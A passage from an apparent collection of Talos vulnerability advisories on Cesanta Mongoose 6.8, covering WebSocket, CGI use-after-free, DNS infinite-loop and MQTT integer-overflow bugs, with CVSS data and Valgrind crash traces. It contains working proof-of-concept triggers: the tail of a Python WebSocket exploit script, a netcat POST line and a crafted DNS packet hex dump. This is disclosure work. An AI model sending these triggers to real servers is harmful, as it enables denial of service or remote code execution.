struct.pack(\"I\",masking_key)\n payload += \"A\"*40 #garbage to pad the packet\n \n \n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((sys.argv[1],int(sys.argv[2])))\n s.send(http_upgrade)\n print s.recv(1024)\n s.send(payload)\n print s.recv(1024)\n \n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose Websocket Protocol Packet Length Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2921"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0428", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0428", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-07T19:10:22", "description": "### Summary\n\nAn exploitable use-after-free vulnerability exists in the HTTP server implementation of Cesanta Mongoose 6.8. An ordinary HTTP POST request with a CGI target can cause a reuse of previously freed pointer potentially resulting in remote code execution. An attacker needs to send this HTTP request over network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-416: Use After Free\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nWhile parsing a specific type of POST request that targets a CGI script, a use-after-free vulnerability is triggered, if compiled with CGI support which is the default. When doing the initial parsing, a structure of type `mg_connection` is allocated in function `mg_create_connection_base`. Then, while working on a reply and since this is a CGI request (target of the request just needs to end with set CGI extension, \u201c.cgi\u201d by default), a CGI handler is invoked in the function `mg_send_http_file`:\n \n \n } else if (is_cgi) {\n #if MG_ENABLE_HTTP_CGI\n mg_handle_cgi(nc, index_file ? index_file : path, path_info, hm, opts);\n #else\n \n\nIn function `mg_handle_cgi` a new connection structure is allocated and a previous one is added to it: struct mg_connection *cgi_nc = mg_add_sock(nc->mgr, fds[0], mg_cgi_ev_handler); [1] struct mg_http_proto_data *cgi_pd = mg_http_get_proto_data(nc); \ncgi_pd->cgi.cgi_nc = cgi_nc; cgi_pd->cgi.cgi_nc->user_data = nc; [2] nc->flags |= MG_F_USER_1;\n\nIn above code, at [1], a new connection structure is created and at [2], the old `nc` is set as the `user_data` field. Since the initial client connection is deemed done, it\u2019s being cleaned and the first `mg_connection` structure is freed by calling `mg_close_conn` in function `mg_socket_if_poll`. This leaves the `cgi_pd->cgi.cgi_nc->user_data` pointer set at [2] pointing to freed memory. Then, when executing the actual CGI event handler function `mg_cgi_ev_handler` this freed data will be accessed in different places depending on the event:\n \n \n static void mg_cgi_ev_handler(struct mg_connection *cgi_nc, int ev,\n void *ev_data) {\n struct mg_connection *nc = (struct mg_connection *) cgi_nc->user_data; [3]\n \n \n ...\n case MG_EV_CLOSE:\n mg_http_free_proto_data_cgi(&mg_http_get_proto_data(nc)->cgi); [4]\n nc->flags |= MG_F_SEND_AND_CLOSE;\n Break;\n \n\nIn the above code, at [3] the pointer to the original connection structure is retrieved (which at this time points to freed memory) and is dereferenced at [4] which ultimately leads to read and write over unallocated memory. If a second request happens at the right time, this freed memory might contain different data or point to other structures leading to server crash and potential remote code execution with multiple carefully controlled post requests.\n\nThis vulnerability can be demonstrated via the example web server application supplied with the library. Since the server may not immediately crash, the vulnerability can be observed by running the server under memory debugger such as valgrind or AddressSanitizer.\n\n### Crash Information\n \n \n Valgrind output:\n \n ==87342== Memcheck, a memory error detector\n ==87342== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.\n ==87342== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info\n ==87342== Command: ./simplest_web_server\n ==87342== \n ==87342== Invalid read of size 8\n ==87342== at 0x40BD62: mg_http_get_proto_data (mongoose.c:5054)\n ==87342== by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421728 is 136 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n ==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== Invalid write of size 8\n ==87342== at 0x40BD84: mg_http_get_proto_data (mongoose.c:5055)\n ==87342== by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421728 is 136 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n ==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== Invalid write of size 8\n ==87342== at 0x40BD8F: mg_http_get_proto_data (mongoose.c:5056)\n ==87342== by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421730 is 144 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n ==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== Invalid read of size 8\n ==87342== at 0x40BD9E: mg_http_get_proto_data (mongoose.c:5059)\n ==87342== by 0x4138DD: mg_cgi_ev_handler (mongoose.c:8249)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421728 is 136 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n ==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== Invalid read of size 8\n ==87342== at 0x4138F1: mg_cgi_ev_handler (mongoose.c:8250)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421768 is 200 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n ==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== Invalid write of size 8\n ==87342== at 0x413905: mg_cgi_ev_handler (mongoose.c:8250)\n ==87342== by 0x406FD9: mg_call (mongoose.c:2051)\n ==87342== by 0x407318: mg_close_conn (mongoose.c:2108)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Address 0x5421768 is 200 bytes inside a block of size 208 free'd\n ==87342== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x407289: mg_destroy_conn (mongoose.c:2101)\n ==87342== by 0x407329: mg_close_conn (mongoose.c:2109)\n ==87342== by 0x40AE38: mg_socket_if_poll (mongoose.c:3697)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== Block was alloc'd at\n ==87342== at 0x4C2FB55: calloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==87342== by 0x4078F2: mg_create_connection_base (mongoose.c:2303)\n ==87342== by 0x4079DC: mg_create_connection (mongoose.c:2328)\n ==87342== by 0x407D45: mg_if_accept_new_conn (mongoose.c:2435)\n ==87342== by 0x409A9F: mg_accept_conn (mongoose.c:3202)\n ==87342== by 0x40A35C: mg_mgr_handle_conn (mongoose.c:3495)\n ==87342== by 0x40ADA9: mg_socket_if_poll (mongoose.c:3690)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87355== \n ==87355== HEAP SUMMARY:\n ==87355== in use at exit: 1,656 bytes in 9 blocks\n ==87355== total heap usage: 11 allocs, 2 frees, 3,704 bytes allocated\n ==87355== \n ==87355== LEAK SUMMARY:\n ==87355== definitely lost: 0 bytes in 0 blocks\n ==87355== indirectly lost: 0 bytes in 0 blocks\n ==87355== possibly lost: 0 bytes in 0 blocks\n ==87355== still reachable: 1,656 bytes in 9 blocks\n ==87355== suppressed: 0 bytes in 0 blocks\n ==87355== Rerun with --leak-check=full to see details of leaked memory\n ==87355== \n ==87355== For counts of detected and suppressed errors, rerun with: -v\n ==87355== ERROR SUMMARY: 0 errors from 0 contexts (suppressed: 0 from 0)\n ==87342== \n ==87342== Process terminating with default action of signal 2 (SIGINT)\n ==87342== at 0x5154573: __select_nocancel (syscall-template.S:84)\n ==87342== by 0x40AB75: mg_socket_if_poll (mongoose.c:3657)\n ==87342== by 0x407729: mg_mgr_poll (mongoose.c:2232)\n ==87342== by 0x4020C2: main (simplest_web_server.c:33)\n ==87342== \n ==87342== HEAP SUMMARY:\n ==87342== in use at exit: 416 bytes in 6 blocks\n ==87342== total heap usage: 14 allocs, 8 frees, 5,008 bytes allocated\n ==87342== \n ==87342== LEAK SUMMARY:\n ==87342== definitely lost: 72 bytes in 1 blocks\n ==87342== indirectly lost: 0 bytes in 0 blocks\n ==87342== possibly lost: 0 bytes in 0 blocks\n ==87342== still reachable: 344 bytes in 5 blocks\n ==87342== suppressed: 0 bytes in 0 blocks\n ==87342== Rerun with --leak-check=full to see details of leaked memory\n ==87342== \n ==87342== For counts of detected and suppressed errors, rerun with: -v\n ==87342== ERROR SUMMARY: 6 errors from 6 contexts (suppressed: 0 from 0)\n \n\n### Exploit Proof-of-Concept\n\necho -ne \u201cPOST /a.cgi HTTP/1.1\\r\\n\\r\\n\u201d | nc localhost 8000 \n---|--- \n \n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose HTTP Server CGI Remote Code Execcution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2891"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0398", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0398", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-13T22:03:02", "description": "### Summary\n\nAn infinite loop programming error exists in the DNS server functionality of Cesanta Mongoose 6.8 library. A specially crafted DNS request can cause an infinite loop resulting in high CPU usage and Denial Of Service. An attacker can send a packet over network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n7.5 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\n\n### CWE\n\nCWE-835: Loop with Unreachable Exit Condition (\u2018Infinite Loop\u2019)\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, DNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nIn a DNS request packet, a name can be compressed to save space. The compression in question relies on pointers to parts of the domain name already present in the packet. When decompressing the names, the DNS server software must look up those pointers and substitute them accordingly.\n\nIn the Mongoose library, the function `mg_dns_uncompress_name` is responsible for decompressing names and a special case for pointers is handled:\n \n \n while ((chunk_len = *data++)) { [3]\n int leeway = dst_len - (dst - old_dst);\n if (data >= end) \n return 0;\n \n \n if (chunk_len & 0xc0) { [1]\n uint16_t off = (data[-1] & (~0xc0)) << 8 | data[0];\n if (off >= msg->pkt.len) {\n return 0;\n \n data = (unsigned char *) msg->pkt.p + off; [2]\n continue;\n \n\nThe name chunk pointer is encoded in a single byte having 2 most significant bits set (0xc0) and rest are an offset to the actual name. In the above code, at [1], a check is performed to see if the current chunk is actually a pointer, and if so, the offset is extracted instead. At [2], this offset is used to advance the parser by adding it to start of the packet. The loop then continues at [3].\n\nIn the above code, no check is performed to see if the calculated offset refers to the same position, or if the pointer points to another pointer. No valid DNS query should have a pointer pointing to another pointer and precisely that kind packet will cause an infinite loop in the above code. An example packet:\n \n \n 00000000: 0020 a577 0120 0001 0000 0000 0001 c00c . .w. ..........\n 00000010: 0000 0000 0100 0100 0029 1000 0000 0000 .........)......\n 00000020: 0000 0a \u2026\n \n\nAt offset 14 above, we have a start of name chunk, which specifies a pointer (0xc0), followed by 0x0c which represents it\u2019s offset from the start of the packet, past the 2 ID bytes. When parsing this packet, function `mg_dns_uncompress_name` will enter an infinite loop, because the first chunk points to itself.\n\nThis causes 100% CPU usage and Denial Of Service.\n\n### Timeline\n\n2017-08-30 - Vendor Disclosure \n2017-10-31 - Public Release\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-31T00:00:00", "type": "talos", "title": "Cesanta Mongoose DNS Query Compressed Name Pointer Denial Of Service", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2909"], "modified": "2017-10-31T00:00:00", "id": "TALOS-2017-0416", "href": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2017-0416", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-06-07T19:10:22", "description": "### Summary\n\nAn exploitable arbitrary memory read vulnerability exists in the MQTT packet parsing functionality of Cesanta Mongoose 6.8. A specially crafted MQTT packet can cause an arbitrary out-of-bounds memory read and write potentially resulting in information disclosure, denial of service and remote code execution. An attacker needs to send a specially crafted MQTT packet over network to trigger this vulnerability.\n\n### Tested Versions\n\nCesanta Mongoose 6.8\n\n### Product URLs\n\n<https://cesanta.com/>\n\n### CVSSv3 Score\n\n9.8 - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n\n### CWE\n\nCWE-190: Integer Overflow or Wraparound\n\n### Details\n\nMongoose is a monolithic library implementing a number of networking protocols, including HTTP, MQTT, MDNS and others. It is designed with embedded devices in mind and as such is used in many IoT devices and runs on virtually all platforms.\n\nWhile parsing an MQTT packet with variable length header no check is performed to assure the calculated payload length corresponds to the actual received packet. An arbitrary length is used in pointer arithmetic leading to arbitrary memory access. Variable payload length in mqtt packet is encoded by 7 bit fields with 8th bit in a byte being used as continuation bit. The following code from the `parse_mqtt` function decodes this:\n \n \n /* decode mqtt variable length */\n do \n \n \n len += (*p & 127) << 7 * (p - &io->buf[1]);\n while ((*p++ & 128) != 0 && ((size_t)(p - io->buf) <= io->len));\n \n\nIn the above code, no check is performed on the calculated `len` value which can be arbitrarily large. By the MQTT standard, the largest MQTT packet can be at most 256 megabytes. Further, a following check is performed:\n \n \n end = p + len;\n if (end > io->buf + io->len + 1) \n return -1;\n \n\nIn the above code, `end` should point to the end of message, and the `if` tries to check if it\u2019s in bounds of the buffer, but since the check is comparing pointers, an integer overflow can cause `end` to wrap around and point before the start of message buffer, while still having huge `len` value calculated before.\n\nThis can cause further memory corruption down the line when actually handling the commands sent in the packet. For example, this can be exploited by sending a \u201cPUBLISH\u201d command, which ends up notifying all the clients subscribed to a certain topic. Still in the `parse_mqtt` function we see:\n \n \n case MG_MQTT_CMD_PUBLISH: {\n if (MG_MQTT_GET_QOS(header) > 0) \n mm->message_id = getu16(p);\n p += 2;\n \n p = scanto(p, &mm->topic);\n \n mm->payload.p = p;\n mm->payload.len = end - p;\n break;\n \n\nThe above code deals with the \u201cPUBLISH\u201d command and uses the `end` pointer and `p` to calculate the length, due to the previous integer overflow , `end` can point to before `p` leading to a large `payload.len` value which is later used when sending the notification to subscribed clients.\n\nWith precise memory layout control, this can be abused to cause an arbitrary write which could lead to remote code execution. On the other hand, there is a potential to abuse this vulnerability to leak large amount of data from the process as the overflown value is used when sending data to clients. The vulnerability can be triggered by sending the supplied proof of concept packet to sample `mqtt_broker` application supplied with the library. It should be noted that depending on memory layout, the proof of concept packet might not crash the application, but it does trigger the bug.\n\n### Crash Information\n \n \n Valgrind output:\n ==118470== Memcheck, a memory error detector\n ==118470== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.\n ==118470== Using Valgrind-3.11.0 and LibVEX; rerun with -h for copyright info\n ==118470== Command: ../../../vanilla/mongoose/examples/mqtt_broker/mqtt_broker\n ==118470== \n MQTT broker started on 0.0.0.0:8113\n ffff==118470== Invalid read of size 1\n ==118470== at 0x4C3236C: memcpy@GLIBC_2.2.5 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403E95: mbuf_insert (mongoose.c:1073)\n ==118470== by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)\n ==118470== by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\n ==118470== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\n ==118470== Address 0x5ce0796 is 6 bytes inside a block of size 10 free'd\n ==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40ECA4: mg_mqtt_publish (mongoose.c:9841)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== Block was alloc'd at\n ==118470== at 0x4C2FD5F: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n ==118470== by 0x408158: mg_send (mongoose.c:2463)\n ==118470== by 0x40EC51: mg_mqtt_publish (mongoose.c:9836)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== \n ==118470== Invalid write of size 1\n ==118470== at 0x4C32372: memcpy@GLIBC_2.2.5 (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403E95: mbuf_insert (mongoose.c:1073)\n ==118470== by 0x40EB8D: mg_mqtt_prepend_header (mongoose.c:9824)\n ==118470== by 0x40ECCA: mg_mqtt_publish (mongoose.c:9843)\n ==118470== by 0x40F9A2: mg_mqtt_broker_handle_publish (mongoose.c:10104)\n ==118470== by 0x40FAF4: mg_mqtt_broker (mongoose.c:10136)\n ==118470== by 0x40E648: mqtt_handler (mongoose.c:9712)\n ==118470== by 0x4071B6: mg_call (mongoose.c:2051)\n ==118470== by 0x408362: mg_recv_common (mongoose.c:2505)\n ==118470== by 0x408393: mg_if_recv_tcp_cb (mongoose.c:2509)\n ==118470== by 0x40A712: mg_handle_tcp_read (mongoose.c:3376)\n ==118470== by 0x40AC8A: mg_mgr_handle_conn (mongoose.c:3501)\n ==118470== Address 0x5ce0798 is 8 bytes inside a block of size 10 free'd\n ==118470== at 0x4C2EDEB: free (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x4C2FDB7: realloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)\n ==118470== by 0x403F74: mbuf_insert (mongoose.c:1080)\n ==118470== by 0x404055: mbuf_append (mongoose.c:1096)\n ==118470== by 0x409E83: mg_socket_if_tcp_send (mongoose.c:3167)\n 